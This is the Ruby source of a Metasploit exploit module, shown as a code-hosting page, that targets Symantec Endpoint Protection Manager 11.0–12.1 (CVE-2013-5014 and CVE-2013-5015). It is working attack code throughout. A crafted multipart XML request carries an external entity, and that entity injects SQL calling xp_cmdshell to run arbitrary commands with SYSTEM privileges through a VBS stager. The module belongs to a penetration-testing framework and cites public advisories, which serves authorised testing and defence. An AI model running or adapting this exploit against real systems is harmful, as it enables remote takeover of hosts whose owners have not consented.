Path: blob/master/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include REXML9include Msf::Exploit::CmdStager10include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',17'Description' => %q{18This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager19versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker20can reach SQL injection affected components. As xp_cmdshell is enabled in the included21database instance, it's possible to execute arbitrary system commands on the target22with SYSTEM privileges.23},24'Author' => [25'Stefan Viehbock', # Discovery26'Chris Graham', # PoC exploit27'xistence <xistence[at]0x90.nl>' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31['CVE', '2013-5014'],32['CVE', '2013-5015'],33['OSVDB', '103305'],34['OSVDB', '103306'],35['EDB', '31853'],36['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']37],38'Arch' => ARCH_X86,39'Platform' => 'win',40'Targets' => [41['Windows VBS Stager', {}]42],43'Privileged' => true,44'DisclosureDate' => '2014-02-24',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56Opt::RPORT(9090),57OptString.new('TARGETURI', [true, 'The base path', '/'])58]59)60deregister_options('CMDSTAGER::FLAVOR')61end6263def check64res = send_request_cgi(65{66'uri' => normalize_uri(target_uri.path),67'method' => 'GET',68}69)7071if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/72return Exploit::CheckCode::Appears73end7475Exploit::CheckCode::Safe76end7778def exploit79print_status("Sending payload")80# Execute the cmdstager, max length of the commands is ~395081execute_cmdstager({ :flavor => :vbs, :linemax => 3950 })82end8384def execute_command(cmd, opts = {})85# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.86command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"8788# Generate random 'xx032xxxx' sequence number.89seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"9091soap = soap_request(seqnum, command)9293post_data = Rex::MIME::Message.new94post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")95xxe = post_data.to_s9697res = send_request_cgi(98{99'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),100'method' => 'POST',101'vars_get' => { 'ActionType' => 'ConsoleLog' },102'ctype' => "multipart/form-data; boundary=#{post_data.bound}",103'data' => xxe,104}105)106107if res and res.body !~ /ResponseCode/108fail_with(Failure::Unknown, "#{peer} - Something went wrong.")109end110end111112def soap_request(seqnum, command)113randpayload = rand_text_alpha(8 + rand(8))114randxxe = rand_text_alpha(8 + rand(8))115entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"116entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"117118xml = Document.new119xml.add(DocType.new('sepm', "[ METASPLOIT ]"))120xml.add_element("Request")121xxe = xml.root.add_element(randxxe)122xxe.text = "PAYLOAD"123124xml_s = xml.to_s125xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding126xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding127128xml_s129end130end131132133